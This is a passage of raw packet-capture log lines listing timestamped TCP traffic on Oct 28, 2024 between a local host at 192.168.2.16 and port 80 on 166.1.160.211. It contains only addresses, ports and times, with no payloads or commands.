                                                                                                                                                              Oct 28, 2024 19:46:20.540399075 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.540421009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.540455103 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.540472031 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.540488005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.540535927 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.540915966 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.540950060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.540982008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.540997028 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.541016102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.541048050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.541064024 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.541081905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.541115999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.541135073 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.541148901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.541182995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.541198015 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.541218042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.541264057 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.544691086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.544744968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.544779062 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.544789076 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.544859886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.544892073 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.544919014 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.544924974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.544970989 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.544975042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.545119047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.545150995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.545170069 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.545185089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.545217991 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.545233965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.545253038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.545300961 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.545444012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.545476913 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.545511961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.545528889 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.545545101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.545579910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.545593977 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.545614958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.545649052 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.545658112 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.545681953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.545716047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.545731068 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.545743942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.545788050 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.548834085 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.583811045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.583869934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.583899975 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.583937883 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.583952904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.583986998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.584006071 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.584084034 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.584116936 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.584132910 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.584248066 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.584283113 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.584294081 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.584317923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.584364891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.584366083 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.584398031 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.584441900 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.584763050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.584826946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.584856033 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.584873915 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.584929943 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.584964037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.584981918 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.584997892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.585046053 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.585079908 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.585129976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.585164070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.585180998 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.585197926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.585242987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.585412979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.585445881 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.585479021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.585485935 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.585510969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.585561991 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.585563898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.585685015 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.585716009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.585728884 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.585763931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.585814953 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.585891962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.585926056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.585958958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.585967064 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.585992098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.586025953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.586041927 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.586060047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.586095095 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.586102962 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.586127996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.586163044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.586173058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.586457968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.586487055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.586508989 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.586519003 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.586555004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.586566925 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.586587906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.586622000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.586639881 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.586658001 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.586707115 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.586857080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.586900949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.586935043 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.586955070 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.586992025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587025881 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587030888 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.587059975 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587105036 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.587110996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587145090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587172985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587198019 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.587205887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587239981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587251902 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.587275028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587308884 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587323904 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.587357998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587402105 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.587686062 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587719917 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587769985 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.587830067 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587881088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587913990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587924957 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.587948084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587975979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.587997913 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.588013887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588047981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588066101 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.588079929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588114023 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588123083 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.588146925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588182926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588200092 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.588222980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588267088 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.588629961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588665009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588699102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588712931 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.588732004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.588782072 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.644143105 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.650237083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650285006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650310993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650341988 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.650398970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650448084 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.650492907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650511026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650527954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650546074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650553942 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.650589943 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.650804996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650831938 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650851011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650866985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650871992 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.650882959 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650903940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650919914 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.650922060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650939941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650949001 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.650959015 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.650985956 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.651549101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651590109 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651607037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651623011 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.651623011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651640892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651659012 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.651660919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651676893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651690006 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.651693106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651710987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651715040 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.651726961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651745081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651746035 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.651760101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651778936 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.651788950 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.651814938 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.652479887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652498007 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652514935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652530909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652540922 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.652546883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652565002 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652571917 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.652582884 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652599096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652611017 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.652616024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652641058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.652642012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652659893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652677059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652686119 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.652693987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.652718067 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.653423071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653439045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653454065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653466940 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.653475046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653491974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653501987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.653508902 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653526068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653532982 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.653543949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653558969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653568983 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.653575897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653594017 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653601885 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.653611898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653629065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653634071 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.653646946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.653671026 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.654369116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.654386044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.654402018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.654414892 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.654418945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.654436111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.654450893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.654462099 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.654468060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.654485941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.654500961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.654503107 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.654512882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.654519081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.654532909 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.654535055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.654551983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.654568911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.654572964 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.654617071 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.655354023 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.655390024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.655424118 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.655436039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.655458927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.655493021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.655508041 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.655528069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.655560970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.655579090 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.655596972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.655632019 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.655648947 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.655666113 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.655699968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.655710936 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.655735016 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.655769110 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.655781031 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.656111002 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.656146049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.656157970 CET4972680192.168.2.16166.1.160.211
